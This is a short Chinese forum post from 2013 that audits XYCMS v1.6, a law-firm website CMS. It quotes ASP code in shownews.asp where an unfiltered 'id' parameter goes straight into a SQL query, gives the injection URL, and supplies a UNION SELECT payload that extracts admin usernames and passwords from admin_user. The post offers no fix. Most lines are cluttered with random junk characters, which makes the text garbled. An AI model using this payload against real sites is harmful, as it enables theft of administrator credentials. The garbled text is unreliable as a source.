前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似3 L1 K7 z" k* z1 Z7 w* _3 A
8 J$ y: K: Y8 } A9 e9 l
淫荡分割线$ H5 x7 [- P4 X! u3 F3 z+ t: Q7 u
--------------------------------------------------------
+ r3 b" N4 k! ]5 R1 H* R
1 A; [' ^' l0 `审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)! E) b9 |1 d0 W" ]
源码地址:http://down.chinaz.com/soft/29233.htm
M D& H. k# ]; ^
. ?3 d5 e7 D0 J: b8 a" K" e漏洞文件:shownews.asp: }9 s) K3 d k7 Z
漏洞代码:7-13行
/ ?, S6 D+ ?% q* s
) A. Z& ~; |4 D1 U% d% d" r' e 6 V' u' n; c: w* m3 d$ J ?6 E9 q
<%
, e2 Z# L) t7 _ a x' W6 V9 [8 Vid=request.QueryString("id")) `! O/ Q/ p* d6 B" p
0 J1 G6 G4 |+ C7 a% K: A
set snews=server.createobject("adodb.recordset")
4 t O: \: f2 {# H# }3 W- wexec="select * from [news] where id="&id
1 k2 S9 c# x4 ?6 Gsnews.open exec,conn,1,1
" B- f8 \. s5 v1 l1 L. N%>9 R. ~6 U# t7 s# C2 @9 G+ M, m
' T2 G" X; v0 s( g0 K! {! M, U
. G4 F! [6 X* o, Y$ y& G# C6 g% T
什么过滤都没有 直造成注入! t9 S. Y) G& n$ O5 Z" q' U& ]
$ b1 U7 {$ K( X) J
注入点:http://127.0.0.1:99/shownews.asp?id=xx# a( d6 S. G1 _; P- \6 T
3 B. p- Y8 v9 k% i, C其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找/ c7 t3 K7 Q3 s
, C3 q1 w, L' x. q( P' \2 X
7 i/ @/ d) n& }* \7 z6 T
exp: union select 1,admin,password,4,5,7 from admin_user
" T M+ |& e# Z f( L+ u) i3 B: p' f9 c3 o) c3 c3 D
|
发表于 2013-4-4 17:28:12
收藏
支持
反对